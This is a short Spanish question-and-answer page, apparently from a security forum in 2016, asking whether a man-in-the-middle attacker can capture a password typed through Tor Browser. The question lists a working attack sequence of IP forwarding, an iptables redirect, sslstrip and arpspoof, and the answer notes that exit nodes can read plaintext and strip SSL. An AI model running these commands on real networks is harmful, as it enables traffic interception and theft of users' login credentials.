¿Cómo puede un atacante rastrear una contraseña con el proxy SOCKS5?

Navega tus respuestas
2

¿Tengo que temer a un atacante local de "hombre en medio" al ingresar la contraseña con tor?

Supongamos que una víctima se está conectando a Facebook con tor Browser.

¿Cómo construiría un atacante un ataque de hombre en el medio que obtenga su contraseña? (qué comandos precisos)

Si no se usa un proxy, el atacante usaría 

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p  tcp --destination-port 80 -j REDIRECT --to-port 54321
sslstrip -l 54321
arpspoof -i eth0  -t < targetIP > < gatewayIP > 
arpspoof -i eth0  -t < gatewayIP > < targetIP>
    
pregunta user123456 07.12.2016 - 02:07
fuente

1 respuesta

1

Hice una publicación de blog sobre esto aquí en 2012: enlace

El hecho es que un atacante puede lanzar ataques como usted menciona. El nodo de salida siempre podrá leer el tráfico de texto sin cifrar e incluso realizar ataques tipo tira SSL.

    
respondido por el Lucas Kauffman 07.12.2016 - 03:18
fuente

Lea otras preguntas en las etiquetas

Almacenamiento de token de autenticación después de la autenticación de la base de datos ¿Por qué la especificación OAuth2 recomienda que no se pasen las credenciales del cliente en el cuerpo de la solicitud?